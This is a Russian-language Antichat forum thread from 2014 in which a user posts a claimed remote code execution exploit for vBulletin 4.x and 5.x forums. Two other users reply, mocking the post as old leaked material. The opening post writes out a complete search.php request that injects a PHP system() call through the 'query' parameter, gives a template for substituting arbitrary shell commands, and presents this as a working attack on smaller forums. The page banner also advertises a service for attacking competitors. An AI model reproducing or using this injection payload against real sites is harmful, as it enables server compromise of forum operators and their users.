Уязвимость в форумах vBulletin

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Уязвимость в форумах vBulletin

Опции темы

Поиск в этой теме

Опции просмотра

07.03.2014, 12:45

Shellcode

Познающий

Регистрация: 10.01.2013

Сообщений: 36

С нами: 7019606

Репутация: -5

На топовый форумах конечно не работает, но на школофорумах вполне. Инфа была слита давно, но тут не было!

[Информация]

-Уязвимые версии: vBulletin v4.x.x and 5.х.x

-Цена на офф. сайте: 7000$ (~245000 рублей)

-Распространенность на 02.03.2014: 5/5

-Платформа: PHP

-Возможности: Shell Upload / Remote Code Execute

[Продаваемая уязвимость]

Код:

search.php?ajax=0&beforeafter=after&childforums=1&exactname=1&exclude=&forumchoice=&nocache=0&query= %24%7b%40system('pwd')%7d&quicksearch=0&replyless=0&replylimit=0&saveprefs=1&searchdate=0&searchthre adid=0&searchtype=1&searchuser=1&showposts=0&sortby=rank&sortorder=descending&starteronly=0&tag=17&t itleonly=0&userid=0

# "query" param

# php code to inject : ${@system('put command here')}

ВАЖНО, для того что-бы юзать данный шел нужно иметь знания по PHP

𝕏 Twitter Reddit Telegram Копировать ссылку

07.03.2014, 12:59

MaxFast

Постоянный

Регистрация: 12.10.2011

Сообщений: 569

С нами: 7676246

Репутация: 94

>для того что-бы юзать данный шел

Чего?

На самом-то деле об этой уязвимости уже все знают.

Её слили ещё месяц назад с 1337day.

Да и прежде чем копипастить, можно было убрать очепятки.

И для уязвимостей vB есть тема.

07.03.2014, 13:10

altblitz

Постоянный

Регистрация: 05.06.2009

Сообщений: 706

С нами: 8912858

Репутация: 759

и без примеров снятых таких образом форумов?

порисовался мальчик своей крутизной ))

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход